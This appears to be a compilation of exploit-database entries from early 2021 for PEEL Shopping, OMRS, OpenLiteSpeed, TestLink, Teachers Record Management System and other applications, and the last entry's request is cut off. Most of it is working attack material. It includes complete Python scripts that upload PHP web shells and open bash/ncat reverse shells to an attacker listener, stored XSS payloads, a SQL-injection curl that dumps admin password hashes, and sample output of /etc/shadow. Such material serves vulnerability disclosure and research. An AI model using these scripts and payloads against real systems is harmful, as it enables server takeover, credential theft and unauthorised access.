
-
PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on: Windows 10 XAMPP
# Description: the 'Address' field of the user-profile form is saved and later rendered back to the page without being neutralised, so a payload stored there executes every time the profile page is loaded (stored XSS, executing in the context of whoever views it).
# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
# Vulnerable parameter: 'Address'
# Payload used (polyglot; fires either via the onclick handler or via the <svg onload> once the surrounding markup is broken out of):
# jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
# POC: save the payload in the Address field, then, on the same page, click the address text box to edit it.
# The injected JavaScript executes (alert box).
-
Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
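# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
# Date: 10/02/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Xampp Server and Wamp Server
# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows.
# Adding the possibility of automatic registration and execution of any command without needing to upload any local file
# Example with registration:    python3 script.py -u http://172.16.1.102:80/ -c 'whoami'
# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123
"""Registration -> login -> PHP upload -> command execution chain for OMRS 1.0.

Flow: (optionally) self-register an account, log in, submit the marriage
registration form with a PHP dropper in the ``husimage`` upload slot, diff the
``/user/images`` directory listing before and after the upload to learn the
name the application stored the file under, then call that file with the
command in the ``cmd`` parameter.
"""
import argparse
import random
import sys

try:
    import requests
except ImportError:  # reported with an install hint from main()
    requests = None

# Dropper written into /user/images; executes the ``cmd`` request parameter.
WEBSHELL_PHP = "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>"
# Filler for the form fields the application insists on.
FILLER = 'omrs_rce'
# Length of the generated file name (everything before ".php") that the
# original exploit slices out of the directory listing.
# TODO(review): confirm this against the application's upload handler before
# targeting a different OMRS build.
STORED_NAME_LEN = 42


def get_args():
    """Parse the command line and return the argparse namespace."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store',
                        help='Url of Online Marriage Registration System (OMRS) 1.0')
    parser.add_argument('-c', '--command', required=True, action='store',
                        help='Command to execute')
    parser.add_argument('-m', '--mobile', required=False, action='store',
                        help='Mobile phone used for registration')
    parser.add_argument('-p', '--password', required=False, action='store',
                        help='Password used for registration')
    return parser.parse_args()


def normalize_url(url):
    """Drop trailing slashes so the ``"%s/user/..."`` joins do not produce ``//``."""
    return url.rstrip('/')


def login(url, mobile, password):
    """Log in as *mobile*/*password* and return the PHPSESSID cookie value.

    Raises RuntimeError when no session cookie comes back, which is what a
    rejected login or a wrong base URL looks like (the original died with a
    bare KeyError at this point).
    """
    resp = requests.post("%s/user/login.php" % url,
                         data={'mobno': mobile, 'password': password, 'login': ''})
    session_id = resp.cookies.get('PHPSESSID')
    if session_id is None:
        raise RuntimeError('no PHPSESSID cookie returned by login.php - wrong credentials or URL?')
    return session_id


def upload(url, cookie, file=None):
    """Submit the marriage form with the PHP dropper in the ``husimage`` slot.

    *file* is accepted for signature compatibility only; as in the original the
    payload is always ``WEBSHELL_PHP``.  The HTTP status is printed so a
    rejected upload is visible instead of being reported as a success.
    """
    files = {
        'husimage': ('shell.php', WEBSHELL_PHP, 'application/x-php', {'Expires': '0'}),
        'wifeimage': ('test.jpg', '', 'image/jpeg'),
    }
    payload = {'dom': '05/01/2020', 'nofhusband': FILLER, 'hreligion': FILLER,
               'hdob': '05/01/2020', 'hsbmarriage': 'Bachelor', 'haddress': FILLER,
               'hzipcode': FILLER, 'hstate': FILLER, 'hadharno': FILLER,
               'nofwife': FILLER, 'wreligion': FILLER, 'wsbmarriage': 'Bachelor',
               'waddress': FILLER, 'wzipcode': FILLER, 'wstate': FILLER,
               'wadharno': FILLER, 'witnessnamef': FILLER, 'waddressfirst': FILLER,
               'witnessnames': FILLER, 'waddresssec': FILLER, 'witnessnamet': FILLER,
               'waddressthird': FILLER, 'submit': ''}
    resp = requests.post("%s/user/marriage-reg-form.php" % url, data=payload,
                         cookies={'PHPSESSID': cookie}, files=files)
    print('[+] PHP shell uploaded (HTTP %d)' % resp.status_code)


def parse_php_files(listing):
    """Return the ``STORED_NAME_LEN``-character tail of every ``.php``-separated chunk of *listing*.

    Mirrors the original parsing exactly, including the trailing fragment after
    the last ``.php``; the result is only used in a before/after set difference,
    so that noise cancels out.
    """
    return [chunk[-STORED_NAME_LEN:] for chunk in listing.split(".php")]


def get_remote_php_files(url):
    """Fetch the ``/user/images`` directory listing and parse the PHP names out of it.

    Depends on directory listing being enabled on the target; with it disabled
    the before/after diff is empty and ``main`` reports the failure.
    """
    resp = requests.get("%s/user/images" % url)
    return parse_php_files(resp.text)


def find_new_file(before, after):
    """Return the name present in *after* but not in *before*, or None.

    Sorted so the pick is deterministic when more than one candidate appears.
    """
    new_names = sorted(set(after) - set(before))
    return new_names[0] if new_names else None


def exec_command(url, webshell, command):
    """Run *command* through the dropped web shell and print its output.

    The command is sent as a real query parameter, so spaces, ``&`` and ``#``
    in it no longer corrupt the URL (the original interpolated it raw).
    """
    resp = requests.get("%s/user/images/%s" % (url, webshell), params={'cmd': command})
    print("[+] Command output\n%s" % resp.text)


def register(mobile, password, url):
    """Create a user account with the given mobile number and password."""
    data = {"fname": FILLER, "lname": FILLER, "mobno": mobile,
            "address": FILLER, "password": password, "submit": ""}
    requests.post("%s/user/signup.php" % url, data=data)
    print("[+] Registered with mobile phone %s and password '%s'" % (mobile, password))


def main():
    """Entry point: register if needed, log in, drop the shell, run the command."""
    if requests is None:
        sys.exit('[-] The "requests" package is required: pip3 install requests')
    args = get_args()
    url = normalize_url(args.url)
    mobile = str(random.randint(100000000, 999999999)) if args.mobile is None else args.mobile
    password = "dante123" if args.password is None else args.password
    if args.password is None or args.mobile is None:
        register(mobile, password, url)
    cookie = login(url, mobile, password)
    before = get_remote_php_files(url)
    upload(url, cookie)
    after = get_remote_php_files(url)
    new_name = find_new_file(before, after)
    if new_name is None:
        sys.exit('[-] No new .php file in /user/images - upload rejected or directory listing disabled')
    exec_command(url, new_name + ".php", args.command)


if __name__ == "__main__":
    main()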
-
Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
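# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
# Date: 26/1/2021
# Exploit Author: Metin Yunus Kandemir
# Discovered by: cmOs - SunCSR
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.8
"""
Description:
The "path" parameter has command injection vulnerability that leads to escalate privilege.
OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege.
However, extUser and extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.
Details: https://github.com/litespeedtech/openlitespeed/issues/217

Example:

Step-1:
ubuntu@ubuntu:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Step-2:
ubuntu@ubuntu:~$ nc -nvlp 4444
Listening on [0.0.0.0] (family 0, port 4444)

Step-3:
ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.98296300 1612966522
[+] Sending reverse shell to 127.0.0.1:4444 ...
[+] Triggering command execution...

Step-4:
ubuntu@ubuntu:~$ nc -nvlp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 127.0.0.1 54534 received!
cat /etc/shadow
root:!:18620:0:99999:7:::
daemon:*:17937:0:99999:7:::
bin:*:17937:0:99999:7:::
sys:*:17937:0:99999:7:::
sync:*:17937:0:99999:7:::
.
.
.
"""
import sys

try:
    import requests
    import urllib3
    from bs4 import BeautifulSoup
except ImportError:  # reported with an install hint from main()
    requests = urllib3 = BeautifulSoup = None

# Only build the injection was confirmed against; anything else is refused.
VULNERABLE_VERSION = "1.7.8"
# Reverse-shell listener; overridable from the command line (see main()).
DEFAULT_LHOST = "127.0.0.1"
DEFAULT_LPORT = "4444"


def build_ext_app(tk, groupId, lhost=DEFAULT_LHOST, lport=DEFAULT_LPORT):
    """Return the confMgr.php form that defines the malicious external application.

    ``path`` is the injected command line - the server launches it as the
    application binary on restart, so the target needs ``/usr/bin/ncat``.
    ``extUser``/``extGroup`` pick the uid/gid the command runs with, which is
    the privilege-escalation half of the bug.  ``tk`` is the per-page token
    scraped by loginReq(); a stale one yields "Illegal entry point!".
    """
    return {
        "name": "lsphp",
        "address": "uds://tmp/lshttpd/lsphp.sock",
        "note": "",
        "maxConns": "10",
        "env": "PHP_LSAPI_CHILDREN=10",
        "initTimeout": "60",
        "retryTimeout": "0",
        "persistConn": "1",
        "pcKeepAliveTimeout": "",
        "respBuffer": "0",
        "autoStart": "2",
        "path": "/usr/bin/ncat -nv %s %s -e /bin/bash" % (lhost, lport),
        "backlog": "100",
        "instances": "1",
        "extUser": "root",
        "extGroup": groupId,
        "umask": "",
        "runOnStartUp": "1",
        "extMaxIdleTime": "",
        "priority": "0",
        "memSoftLimit": "2047M",
        "memHardLimit": "2047M",
        "procSoftLimit": "1400",
        "procHardLimit": "",
        "a": "s",
        "m": "serv",
        "p": "ext",
        "t": "A_EXT_LSAPI",
        "r": "lsphp",
        "tk": tk,
    }


def triggerCommandExec(target, s):
    """Restart the service so the newly defined external app (our command) is spawned."""
    trigger = s.post("https://" + target + "/view/serviceMgr.php",
                     data={"act": "restart"}, allow_redirects=False)
    if trigger.status_code == 200:
        print("[+] Triggering command execution...")
    else:
        print("[-] Something went wrong!")


def commandExec(tk, groupId, s, target, lhost=DEFAULT_LHOST, lport=DEFAULT_LPORT):
    """Save the malicious external-app definition, then trigger the restart.

    Exits with status 1 on a non-200 reply or when the console rejects the
    ``tk`` token.
    """
    resp = s.post("https://" + target + "/view/confMgr.php",
                  data=build_ext_app(tk, groupId, lhost, lport), allow_redirects=False)
    if resp.status_code != 200:
        print("[-] Something went wrong!")
        sys.exit(1)
    if resp.text == "Illegal entry point!":
        print("[-] tk value is incorrect!")
        sys.exit(1)
    print("[+] Sending reverse shell to %s:%s ..." % (lhost, lport))
    triggerCommandExec(target, s)


def loginReq(target, username, password, groupId, lhost=DEFAULT_LHOST, lport=DEFAULT_LPORT):
    """Authenticate to the WebAdmin console, fingerprint the version, scrape ``tk`` and hand off.

    Exits with status 1 on bad credentials, connection errors, an unexpected
    page layout, or a version other than 1.7.8 (the original silently did
    nothing in that last case).
    """
    # The WebAdmin console normally serves a self-signed certificate, so TLS
    # verification is disabled for the whole session (the original only passed
    # verify=False on the POSTs; the two GETs would have failed verification).
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    s.verify = False
    login = s.post("https://" + target + "/login.php",
                   data={"userid": username, "pass": password}, allow_redirects=False)
    if login.status_code == 302:
        print("[+] Authentication was successful!")
    elif login.status_code == 200:
        print("[-] Authentication was unsuccessful!")
        sys.exit(1)
    else:
        print("[-] Connection error!")
        sys.exit(1)
    version = s.get("https://" + target + "/index.php")
    banner = BeautifulSoup(version.text, "html.parser").find('div', {'class': 'project-context hidden-xs'})
    if banner is None:
        print("[-] Could not find the version banner on index.php!")
        sys.exit(1)
    parts = banner.text.split()
    if len(parts) < 3:
        print("[-] Unexpected version banner: %r" % banner.text)
        sys.exit(1)
    v = parts[2]
    print("[+] Version is detected: OpenLiteSpeed %s" % v)
    if v != VULNERABLE_VERSION:
        print("[-] Version %s is not %s - untested, aborting!" % (v, VULNERABLE_VERSION))
        sys.exit(1)
    print("[+] The target is vulnerable!")
    # getting tk value
    getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")
    tk_input = BeautifulSoup(getTk.text, 'html.parser').find('input', {'name': 'tk'})
    if tk_input is None:
        print("[-] Could not find the tk token on the external-app page!")
        sys.exit(1)
    tk = tk_input.get('value')
    print("[+] tk value is obtained: " + tk)
    commandExec(tk, groupId, s, target, lhost, lport)


def main(args):
    """Usage: ``targetIp:port username password groupId [lhost lport]``."""
    if len(args) not in (5, 7):
        print("usage: %s targetIp:port username password groupId [lhost lport]" % (args[0]))
        print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow")
        sys.exit(1)
    if requests is None:
        print("[-] Missing dependencies: pip3 install requests urllib3 beautifulsoup4")
        sys.exit(1)
    lhost = args[5] if len(args) == 7 else DEFAULT_LHOST
    lport = args[6] if len(args) == 7 else DEFAULT_LPORT
    loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4],
             lhost=lhost, lport=lport)


if __name__ == "__main__":
    main(args=sys.argv)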
-
PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path
# Exploit Title: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 02-11-2020
# Vendor Homepage: https://www.pdfcomplete.com/cms/dpl/tabid/111/Default.aspx?r=du2vH8r
# Software Links : https://pdf-complete.informer.com/download/
# Tested Version: 4.1.45
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits

# Impact: the service binary path contains spaces and is not quoted, the service starts automatically and runs as LocalSystem. A local user who can create a file at one of the locations Windows tries first (e.g. C:\Program.exe or "C:\Program Files (x86)\PDF.exe") gets that file executed as SYSTEM on the next service start.

# Step to discover Unquoted Service Path (auto-start services outside C:\Windows whose path is not quoted):

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

PDF Document Manager  pdfcDispatcher  C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService  Auto

# Service configuration (Spanish-locale `sc` output; note the unquoted NOMBRE_RUTA_BINARIO / BINARY_PATH_NAME, AUTO_START and the LocalSystem account):

C:\>sc qc pdfcDispatcher
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: pdfcDispatcher
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : PDF Document Manager
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
-
School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting
# Exploit Title: School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Suresh Kumar
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12613/php-attendance-monitoring-system-barcode-scanning.html
# Software: School Event Attendance Monitoring System 1.0
# Tested on: Windows 10 XAMPP
# Description: the 'Item Name' value of a sanction is stored and rendered back on the sanction page without being neutralised, so a script saved there runs for every user who opens that page (stored XSS).
# Vulnerable Page: http://localhost/attendance/sanction
# Vulnerable functionality: 'Add Sanction'
# Vulnerable Input Field: Item Name
# Payload used: "><script>alert(document.cookie)</script>
# POC: add a sanction with the payload as Item Name; each time the page (http://localhost/attendance/sanction) is loaded, the stored script executes.
# You will see your JavaScript code (XSS) executed.
-
School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting
# Exploit Title: School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14155/school-file-management-system.html
# Software: School File Management System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# Description: the first-name and last-name values saved through 'Update Account' are rendered back on the profile page without being neutralised, so a script stored there runs whenever the profile is viewed (stored XSS).
# Vulnerable Page: http://localhost/School%20File%20Management%20System/student_profile.php
# Vulnerable functionality: 'Update Account'
# Vulnerable Input Fields: {Firstname} {Lastname}
# Payload used: "><script>alert(document.cookie)</script>
# POC: save the payload in either field; each time the page (http://localhost/School%20File%20Management%20System/student_profile.php) is loaded, the stored script executes.
# You will see your JavaScript code (XSS) executed.
-
TestLink 1.9.20 - Unrestricted File Upload (Authenticated)
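#!/usr/bin/env python3
# Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated)
# Date: 14th February 2021
# Exploit Author: snovvcrash
# Original Research by: Ackcent AppSec Team
# Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/
# Vendor Homepage: https://testlink.org/
# Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code
# Version: 1.9.20
# Tested on: Ubuntu 20.10
# CVE: CVE-2020-8639
# Requirements: pip3 install -U requests bs4
# Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink
"""
Raw exploit request:

POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067
Content-Length: 1187
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1
Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f
Upgrade-Insecure-Requests: 1

-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="CSRFName"

CSRFGuard_1115715115
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="CSRFToken"

506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="importType"

/../../../logs/pwn.php
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="MAX_FILE_SIZE"

409600
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml"
Content-Type: application/xml

<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="tproject_id"

1
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="UploadFile"

Upload file
-----------------------------242818621515179709592867995067--
"""
import re
from argparse import ArgumentParser
from base64 import b64encode
from cmd import Cmd
from urllib import parse

try:
    import requests
    from bs4 import BeautifulSoup
except ImportError:  # reported with an install hint at start-up
    requests = BeautifulSoup = None


def build_parser():
    """Return the command-line parser (kept out of module scope so importing is side-effect free)."""
    parser = ArgumentParser()
    parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"')
    parser.add_argument('-u', '--username', default='admin', help='TestLink username')
    parser.add_argument('-p', '--password', default='admin', help='TestLink password')
    parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format <HOST:PORT>, ex. "127.0.0.1:8080"')
    return parser


class TestLinkWebShell(Cmd):
    """Semi-interactive shell over a PHP dropper written through keywordsImport.php.

    The ``importType`` form field is used as a path by the keyword importer
    and is not validated, so ``/../../../logs/pwn.php`` makes the uploaded
    "XML" land as a PHP file under the web root (see the raw request above).
    """

    # Executes the ``c`` request parameter and returns stdout+stderr.
    payloadPHP = """<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>"""
    # Where the dropper ends up, relative to the TestLink root URL.
    uploadPath = 'logs/pwn.php'
    prompt = '$ '

    def __init__(self, target, username, password, proxies):
        """Open a session and scrape the CSRF fields from login.php.

        Raises Exception if any of the expected hidden inputs is missing (the
        original crashed with an AttributeError on ``None``).
        """
        super().__init__()
        self.target = target
        self.username = username
        self.password = password
        if proxies:
            self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'}
        else:
            self.proxies = None
        self.session = requests.Session()
        # Lab targets commonly use self-signed certificates; verification is
        # off for that reason only (urllib3 will warn once per request).
        self.session.verify = False
        resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies)
        soup = BeautifulSoup(resp.text, 'html.parser')
        self.csrf_name = self._hidden(soup, 'CSRFName')
        self.csrf_token = self._hidden(soup, 'CSRFToken')
        self.req_uri = self._hidden(soup, 'reqURI')
        self.destination = self._hidden(soup, 'destination')

    @staticmethod
    def _hidden(soup, name):
        """Return the value of the hidden input *name*, with a readable error if the page layout changed."""
        tag = soup.find('input', {'name': name})
        if tag is None:
            raise Exception(f'Could not find hidden input "{name}" on login.php')
        return tag.get('value')

    def auth(self):
        """Log in and extract a ``tproject_id`` from the main page.

        NOTE(review): a 200 on login.php is taken as success, as in the
        original; whether TestLink also answers 200 on rejected credentials is
        not established here - the failure then shows up as a missing
        keywordsView link below.
        """
        data = {
            'CSRFName': self.csrf_name,
            'CSRFToken': self.csrf_token,
            'reqURI': self.req_uri,
            'destination': self.destination,
            'tl_login': self.username,
            'tl_password': self.password
        }
        resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies)
        if resp.status_code != 200:
            raise Exception('Authentication failed')
        print('[*] Authentication succeeded')
        resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies)
        if resp.status_code != 200:
            raise Exception('Error loading mainPage.php iframe contents')
        print('[*] Loaded mainPage.php iframe contents')
        soup = BeautifulSoup(resp.text, 'html.parser')
        link = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')})
        if link is None:
            raise Exception('No keywordsView link on mainPage.php - login rejected or no test project?')
        self.tproject_id = parse.parse_qs(parse.urlsplit(link.get('href')).query)['tproject_id'][0]
        print(f'[+] Extracted tproject_id value: {self.tproject_id}')

    def _run(self, command):
        """Send *command* to the dropper; the value goes as a query parameter so shell metacharacters survive."""
        return self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}',
                                params={'c': command}, proxies=self.proxies)

    def upload_web_shell(self):
        """Post the dropper through keywordsImport.php, then probe it with ``whoami``."""
        files = [
            ('CSRFName', (None, self.csrf_name)),
            ('CSRFToken', (None, self.csrf_token)),
            # Path traversal: the importer treats this as a file name.
            ('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')),
            ('MAX_FILE_SIZE', (None, '409600')),
            ('uploadedFile', ('foo.xml', TestLinkWebShell.payloadPHP)),
            ('tproject_id', (None, self.tproject_id)),
            ('UploadFile', (None, 'Upload file'))
        ]
        resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies)
        if resp.status_code != 200:
            raise Exception('Error uploading web shell')
        print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}')
        print('[*] Trying to query whoami...')
        resp = self._run('whoami')
        if resp.status_code != 200:
            raise Exception('Error interacting with the web shell')
        print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}')

    def emptyline(self):
        """An empty line does nothing (Cmd would otherwise repeat the last command)."""
        pass

    def preloop(self):
        """Authenticate and drop the shell before the first prompt."""
        self.auth()
        self.upload_web_shell()

    def default(self, args):
        """Any line that is not a built-in command is executed on the target."""
        try:
            resp = self._run(args)
            if resp.status_code == 200:
                print(resp.text.strip())
        except Exception as e:
            print(f'*** Something weired happened: {e}')

    @staticmethod
    def reverse_shell_command(lhost, lport):
        """Build the base64-wrapped bash reverse-shell one-liner for *lhost*:*lport*."""
        payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
        b64_payload = b64encode(payload.encode()).decode()
        return f'echo {b64_payload} | base64 -d | /bin/bash'

    def do_spawn(self, args):
        """Spawn a reverse shell. Usage: \"spawn <LHOST> <LPORT>\"."""
        try:
            lhost, lport = args.split()
        except ValueError:
            print('*** Usage: spawn <LHOST> <LPORT>')
            return
        try:
            self.default(self.reverse_shell_command(lhost, lport))
        except Exception as e:
            print(f'*** Something weired happened: {e}')

    def do_EOF(self, args):
        """Use Ctrl-D to exit the shell."""
        print(); return True


if __name__ == '__main__':
    args = build_parser().parse_args()
    if requests is None:
        raise SystemExit('[-] Missing dependencies: pip3 install -U requests bs4')
    tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy)
    tlws.cmdloop('Type help for list of commands')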
-
Teachers Record Management System 1.0 - 'searchteacher' SQL Injection
# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection
# Date: 13/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html
# Version: 1.0
# Tested on: latest version of Chrome, Firefox on Windows and Linux

--------------------------Proof of Concept-----------------------
1. Navigate to http://host/trms/
2. The "searchteacher" POST parameter of search-teacher.php is used in a SQL query without sanitisation and is vulnerable to SQL injection.
3. The curl request below uses a UNION-based injection (the original query selects 10 columns, hence the ten union columns) to display the admin username and password hash from the tbladmin table.

------------------------Exploit request-----------------------------

curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://192.168.1.13/trms/' -H $'Cookie: PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \
    --data-binary $'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search=' \
    $'http://host/trms/search-teacher.php'
-
Tasks 9.7.3 - Insecure Permissions
# Exploit Title: Tasks 9.7.3 - Insecure Permissions
# Date: 18th of July, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
# Vendor Homepage: https://tasks.org/
# Software Link: https://github.com/tasks/tasks
# Version: 9.7.3
# Tested on: Android 9

Any application installed on the victim's phone can add arbitrary tasks to the user's task list through insecure IPC handling: the exported activities below accept intents from any caller without checking the sender. A malicious application has several ways to achieve that:

1. By sending multiple intents to the ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). The Tasks application adds the first requested "task" to the user's task list.

2. By sending an intent to the VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate the intent's origin, so any application can append tasks to the user's task list.

We used the Drozer application to emulate malicious-app activity. Please find the commands below.

run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"

run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"
-
BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)
# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)
# Date: 16-02-2021
# Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited
# Vendor Homepage: https://blackcat-cms.org/
# Software Link: https://blackcat-cms.org/page/download.php
# Version: BlackCat CMS - 1.3.6
# Tested on: Windows

# Steps to Reproduce:
1. Exploitation requires an account that can log in to the admin panel. Log in, click the admin profile button, enter the payload " onmouseover=alert(1) " in the Display name field and click Save. The value is stored without being neutralised, so the closing quote breaks out of the attribute and the handler becomes part of the markup (stored XSS in an authenticated context).
2. Refresh the page and hover the mouse over the Display name field: the alert pops up.
-
Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
# Date: 16-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86

# --- Description ---
# The 'email' and 'password' POST parameters of 'login.php' are placed into the login query without sanitisation, so both are SQL-injectable.

# --- Proof of concept ---
# Curl request for authentication bypass via SQL injection in parameter 'email': the injected `' or 1=1;#` makes the WHERE clause always true and comments out the rest of the query (including the password check), so the request logs in without valid credentials:

